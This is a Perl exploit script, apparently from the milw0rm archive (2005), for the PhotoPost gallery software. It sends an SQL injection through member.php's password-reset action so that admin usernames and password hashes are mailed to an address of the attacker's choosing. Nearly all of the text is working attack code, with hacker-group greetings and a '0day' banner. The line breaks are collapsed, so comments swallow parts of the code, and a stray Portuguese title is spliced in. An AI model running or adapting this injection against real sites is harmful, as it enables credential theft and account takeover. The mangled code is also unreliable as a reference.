#!/usr/bin/perl
PhotoPost dados arbitrários exploit remoto
# PhotoPost Arbitrary Data Exploit# --------------------------------# INFPG - Hacking&Security Research### Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.## Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,# Jasakom,ECHO,etc..betst reagrds t0 whell.# Info: www.98.to/infamous#use IO::Socket;if (@ARGV < 3){system "clear";print "PhotoPost Arbitrary Data Exploit\n";print "\n-------------------------------\n";print "\nINFGP-Hacking&Security Research\n";print "\n\n";print "[?]Usage: perl $0 [host] [path] [mail] \n";exit(1);}system "clear";$server = $ARGV[0];$folder = @ARGV[1];$mail = @ARGV[2];print "Connecting to host ...\n";$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80"); unless ($socket){ die "Server is offline\n"}print "[+]Connected\n\n";print "[+]Building string core..\n";$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail,%20concat(username,"%20",%20password)%20from%20users';print "Sent 0day..\n\n";print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";print "Server Exploited\n";print "You should check $mail now";close($socket);# milw0rm.com [2005-05-13]
